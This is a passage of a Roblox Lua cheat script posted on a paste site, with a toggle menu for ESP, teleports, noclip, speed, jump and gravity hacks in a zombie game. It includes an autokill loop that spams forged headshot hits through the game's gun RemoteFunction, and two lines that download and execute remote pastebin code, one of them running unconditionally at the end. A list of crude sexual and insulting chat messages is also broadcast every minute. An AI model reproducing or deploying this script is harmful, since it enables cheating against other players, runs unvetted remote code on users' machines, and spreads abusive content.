  637. uis = game:GetService('UserInputService');
  638. open = true;
  639. chats = { '[Dddyunknown_45273]: Fucking a lego pussy i see ;)', '[Dddyunknown_45273]: im bored so i made this ok', '[Dddyunknown_45273]: Suck my hairy pp', '[Dddyunknown_45273]: i wonder how i can stop being bored', '[Dddyunknown_45273]: i go pussy hunting not fucking dick riding son', '[Dddyunknown_45273]: if cj uses this in the future ur fat cj ok', '[Dddyunknown_45273]: i get wanked by a lot of thots', '[Dddyunknown_45273]: twan102018 is a skid and thinks i come from the netherlands', '[dvs2]: thx exploits hacker man'};
  640. --Toggles
  641. rggb = false;
  642. fullbright = false;
  643. superspeed = false;
  644. jumppower = false;
  645. lowgrav = false;
  646. noclipp = false;
  647. autokilltog = false;
  648. open = true;
  649. --toggle
  650. uis.InputBegan:Connect(function(key, gp)
  651. if key.KeyCode == hk then
  652. if uis:GetFocusedTextBox() == nil then
  653. if open == true then
  654. open = false
  655. for a,b in next,ui:GetDescendants() do
  656. if b:IsA("Frame") then
  657. b.Visible = false
  658. end
  659. end
  660. elseif open == false then
  661. open = true
  662. for a,b in next,ui:GetDescendants() do
  663. if b:IsA("Frame") then
  664. b.Visible = true
  665. end
  666. end
  667. end
  668. end
  669. end
  670. end)
  671. --esp shit
  672. zombie = workspace:WaitForChild("Zombie Storage");
  673. esp_tog = false;
  674.  
  675. function removeEsp(z)
  676. for i,v in pairs(z['HumanoidRootPart']:GetChildren()) do
  677. if v:IsA("BillboardGui") then
  678. v:Destroy();
  679. end
  680. end
  681. end
  682.  
  683. function doEsp(z)
  684. billui:Clone().Parent=z['HumanoidRootPart'];
  685. end
  686.  
  687. esp.MouseButton1Down:Connect(function()
  688. if not esp_tog then
  689. esp_tog = true;
  690. esp.Text = 'ON'
  691. esp.TextColor3 = Color3.fromRGB(142, 28, 255)
  692. for i,v in pairs(zombie:GetChildren()) do
  693. doEsp(v);
  694. end
  695. else
  696. esp_tog = false;
  697. esp.Text = 'OFF'
  698. esp.TextColor3 = Color3.fromRGB(255,0,0)
  699. for i,v in pairs(zombie:GetChildren()) do
  700. removeEsp(v);
  701. end
  702. end
  703. end)
  704.  
  705. zombie.ChildAdded:Connect(function(h)
  706. repeat wait(); until h['HumanoidRootPart'];
  707. if esp_tog then
  708. doEsp(h);
  709. end
  710. end)
  711. --map tp shit
  712. maptp.MouseButton1Down:Connect(function()
  713. if map then
  714. maptp.Text = 'ON'
  715. maptp.TextColor3 = Color3.fromRGB(142, 28, 255)
  716. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = map:FindFirstChild("Spawn").CFrame
  717. wait(.3)
  718. maptp.Text = "OFF"
  719. maptp.TextColor3 = Color3.fromRGB(255, 0, 0)
  720. end
  721. end)
  722. --autokill fuck shit
  723. autokill.MouseButton1Down:Connect(function()
  724. autokilltog = not autokilltog
  725. if autokilltog == true then
  726. autokill.Text = 'ON'
  727. autokill.TextColor3 = Color3.fromRGB(142, 28, 255)
  728. elseif autokilltog == false then
  729. autokill.Text = 'OFF'
  730. autokill.TextColor3 = Color3.fromRGB(255,0,0)
  731. end;
  732. while wait(0.2) do
  733. if autokilltog == true then
  734. local Tool = game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Tool")
  735. if not Tool then return end
  736. local GunController = Tool:FindFirstChild("GunController")
  737. if not GunController then return end
  738. if GunController and GunController:FindFirstChild("RemoteFunction") then
  739. for i,v in pairs(game.Workspace["Zombie Storage"]:GetChildren()) do
  740. if v:FindFirstChild("Humanoid") and v.Humanoid.Health > 0 then
  741. local Args = {["Name"] = Tool.Name, ["HumanoidTables"] = {[1] = {["HeadHits"] = 1, ["THumanoid"] = v.Humanoid, ["BodyHits"] = 0}}}
  742. spawn(function()
  743. for Each = 1, 20 do
  744. GunController.RemoteFunction:InvokeServer(Args)
  745. end
  746. end)
  747. end
  748. end
  749. end
  750. end
  751. end
  752. end)
  753.  
  754. --lobby teleport shit
  755. lobby.MouseButton1Down:Connect(function()
  756. lobby.Text = "ON"
  757. lobby.TextColor3 = Color3.fromRGB(142, 28, 255)
  758. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(225.5, 0.502, 559.5)
  759. wait(.3)
  760. lobby.Text = "OFF"
  761. lobby.TextColor3 = Color3.fromRGB(255, 0, 0)
  762. end)
  763.  
  764.  
  765. --noclip shit
  766. game:GetService('RunService').Stepped:connect(function()
  767. if noclipp then
  768. game.Players.LocalPlayer.Character.Humanoid:ChangeState(11)
  769. end
  770. end)
  771.  
  772. noclip.MouseButton1Down:Connect(function()
  773. noclipp = not noclipp
  774. if noclip.Text == 'OFF' then
  775. noclip.Text = 'ON'
  776. noclip.TextColor3 = Color3.fromRGB(142, 28, 255)
  777. else
  778. noclip.Text = 'OFF'
  779. noclip.TextColor3 = Color3.fromRGB(255, 0, 0)
  780. end
  781. end)
  782. --gravity
  783. lowgravity.MouseButton1Down:Connect(function()
  784. if lowgrav == false then
  785. lowgravity.Text = 'ON';
  786. lowgravity.TextColor3 = Color3.fromRGB(142, 28, 255);
  787. workspace.Gravity = 50;
  788. lowgrav = true;
  789. elseif lowgrav == true then
  790. workspace.Gravity = 196;
  791. lowgrav = false;
  792. lowgravity.Text = 'OFF';
  793. lowgravity.TextColor3 = Color3.fromRGB(255,0,0);
  794. end;
  795. end)
  796. --jump power shit
  797. jpower.MouseButton1Down:Connect(function()
  798. if jumppower == false then
  799. game.Players.LocalPlayer.Character.Humanoid.JumpPower = 200
  800. jumppower = true
  801. jpower.Text = 'ON'
  802. jpower.TextColor3 = Color3.fromRGB(142, 28, 255)
  803. elseif jumppower == true then
  804. game.Players.LocalPlayer.Character.Humanoid.JumpPower = 50
  805. jumppower = false
  806. jpower.Text = 'OFF'
  807. jpower.TextColor3 = Color3.fromRGB(255,0,0)
  808. end
  809. end)
  810. --superspeed shit
  811. sspeed.MouseButton1Down:Connect(function()
  812. if superspeed == false then
  813. game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 90
  814. superspeed = true
  815. sspeed.Text = 'ON'
  816. sspeed.TextColor3 = Color3.fromRGB(142, 28, 255)
  817. elseif superspeed == true then
  818. game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
  819. superspeed = false
  820. sspeed.Text = 'OFF'
  821. sspeed.TextColor3 = Color3.fromRGB(255,0,0)
  822. end
  823. end)
  824. --Full birght thing
  825. fbright.MouseButton1Down:Connect(function()
  826. if fullbright == false then
  827. game.Lighting.Brightness = 8;
  828. fbright.Text = 'ON';
  829. fbright.TextColor3 = Color3.fromRGB(142, 28, 255)
  830. fullbright = true;
  831. elseif fullbright == true then
  832. game.Lighting.Brightness = 2;
  833. fullbright = false;
  834. fbright.Text = 'OFF';
  835. fbright.TextColor3 = Color3.new(1, 0, 0)
  836. end;
  837. end)
  838. --nine eleven
  839. nineelev.MouseButton1Down:Connect(function()
  840. nineelev.Text = "ON"
  841. nineelev.TextColor3 = Color3.fromRGB(142, 28, 255)
  842. loadstring(game:HttpGet(('https://pastebin.com/raw/BPUCKApA'),true))()
  843. wait(2.3)
  844. nineelev.Text = "OFF"
  845. nineelev.TextColor3 = Color3.new(1, 0, 0)
  846. end);
  847. --Rgb shit
  848. rgb.MouseButton1Down:Connect(function()
  849. if rggb == false then
  850. rggb = true
  851. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  852. local counter = 0
  853. while wait() do
  854. script.Parent.visual.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1);
  855. script.Parent.visual.desc.TextStrokeColor3 = Color3.fromHSV(zigzag(counter),1,1);
  856. script.Parent.visual.desc.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1);
  857. script.Parent.visual.title.TextStrokeColor3 = Color3.fromHSV(zigzag(counter),1,1);
  858. script.Parent.visual.title.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1);
  859. script.Parent.teleports.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1);
  860. script.Parent.teleports.title.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1);
  861. script.Parent.teleports.title.TextStrokeColor3 = Color3.fromHSV(zigzag(counter),1,1);
  862. script.Parent.teleports.desc.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1);
  863. script.Parent.teleports.desc.TextStrokeColor3 = Color3.fromHSV(zigzag(counter),1,1);
  864. script.Parent.miscellaneous.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1);
  865. script.Parent.miscellaneous.title.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1);
  866. script.Parent.miscellaneous.title.TextStrokeColor3 = Color3.fromHSV(zigzag(counter),1,1);
  867. script.Parent.miscellaneous.desc.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1);
  868. script.Parent.miscellaneous.desc.TextStrokeColor3 = Color3.fromHSV(zigzag(counter),1,1);
  869. script.Parent.char.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  870. script.Parent.char.title.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  871. script.Parent.char.title.TextStrokeColor3 = Color3.fromHSV(zigzag(counter),1,1)
  872. script.Parent.char.desc.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  873. script.Parent.char.desc.TextStrokeColor3 = Color3.fromHSV(zigzag(counter),1,1)
  874. counter = counter + 0.01
  875. rgb.Text = 'ON'
  876. rgb.TextColor3 = Color3.fromRGB(142, 28, 255)
  877. if rggb == false then
  878. rgb.Text = 'OFF'
  879. rgb.TextColor3 = Color3.new(1, 0, 0)
  880.  
  881. script.Parent.visual.desc.TextStrokeColor3 = Color3.fromRGB(142, 28, 255)
  882. script.Parent.visual.desc.BorderColor3 = Color3.fromRGB(142, 28, 255)
  883. script.Parent.visual.BorderColor3 = Color3.fromRGB(142, 28, 255)
  884. script.Parent.visual.title.TextStrokeColor3 = Color3.fromRGB(142, 28, 255)
  885. script.Parent.visual.title.BorderColor3 = Color3.fromRGB(142, 28, 255)
  886. script.Parent.teleports.BorderColor3 = Color3.fromRGB(142, 28, 255)
  887. script.Parent.teleports.title.BorderColor3 = Color3.fromRGB(142, 28, 255)
  888. script.Parent.teleports.title.TextStrokeColor3 = Color3.fromRGB(142, 28, 255)
  889. script.Parent.teleports.desc.BorderColor3 = Color3.fromRGB(142, 28, 255)
  890. script.Parent.teleports.desc.TextStrokeColor3 = Color3.fromRGB(142, 28, 255)
  891. script.Parent.miscellaneous.BorderColor3 = Color3.fromRGB(142, 28, 255)
  892. script.Parent.miscellaneous.title.BorderColor3 = Color3.fromRGB(142, 28, 255)
  893. script.Parent.miscellaneous.title.TextStrokeColor3 = Color3.fromRGB(142, 28, 255)
  894. script.Parent.miscellaneous.desc.BorderColor3 = Color3.fromRGB(142, 28, 255)
  895. script.Parent.miscellaneous.desc.TextStrokeColor3 = Color3.fromRGB(142, 28, 255)
  896. script.Parent.char.BorderColor3 = Color3.fromRGB(142, 28, 255)
  897. script.Parent.char.title.BorderColor3 = Color3.fromRGB(142, 28, 255)
  898. script.Parent.char.title.TextStrokeColor3 = Color3.fromRGB(142, 28, 255)
  899. script.Parent.char.desc.BorderColor3 = Color3.fromRGB(142, 28, 255)
  900. script.Parent.char.desc.TextStrokeColor3 = Color3.fromRGB(142, 28, 255)
  901. break
  902. end
  903. end
  904. else
  905. rggb = false
  906. end
  907. end);
  908. -- chat thing
  909. while wait(60) do
  910. bc = Color3.fromRGB(142, 28, 255)
  911. game.StarterGui:SetCore("ChatMakeSystemMessage", {
  912. Text = chats[ math.random( 0, #chats - 1 ) ];
  913. Font = Enum.Font.Cartoon;
  914. Color = bc;
  915. FontSize = Enum.FontSize.Size96
  916. })
  917. end
  918. end
  919.  
  920. print("u has autism and ur a skid if u see dis")
  921. coroutine.resume(coroutine.create(SCRIPT_MJOV70_FAKESCRIPT))
  922. loadstring(game:HttpGet(('https://pastebin.com/raw/tzTXmYf2'),true))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement